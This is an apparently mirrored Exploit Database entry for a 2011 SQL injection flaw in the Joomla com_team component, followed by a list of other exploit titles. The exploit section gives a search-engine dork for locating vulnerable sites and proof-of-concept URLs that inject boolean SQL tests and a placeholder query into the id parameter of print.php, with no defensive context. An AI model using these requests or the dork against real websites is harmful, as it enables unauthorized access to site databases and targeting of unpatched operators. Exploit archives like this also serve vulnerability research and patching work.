Joomla! Component com_team – SQL Injection

Exploit Database
11 阅读

作者： CoBRa_21

日期： 2011-06-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17412/

******************************************************************************** 
Joomla Component (com_team) SQL Injection Vulnerability
********************************************************************************

Author : CoBRa_21

Dork : inurl:com_team

********************************************************************************
Exploit

http://localhost/[PATH]/print.php?task=person&id=36 and 1=1

http://localhost/[PATH]/print.php?task=person&id=36 and 1=2

http://localhost/[PATH]/print.php?task=person&id=36 [SQL]

********************************************************************************
Ordu-yu Lojistik TIM // CoBRa_21
********************************************************************************

last Exploits
Joomla! Component com_team – SQL Injection的更多信息

xClassified – ‘ads.php’ SQL Injection：
Notilus Travel Solution Software 2012 R3 – SQL Injection：
Ay Computer (Multiple Products) – Multiple SQL Injections：
Yosoro 1.0.4 – Remote Code Execution：
Virtual Airlines Manager 2.6.2 – ‘airport’ SQL Injection：
Ericsson Network Location MPS GMPC21 – Privilege Escalation (Metasploit)：
AneCMS – ‘/registre/next’ SQL Injection：
MODx manager – ‘/controllers/default/resource/tvs.php?class_key’ Traversal Local File Inclusion：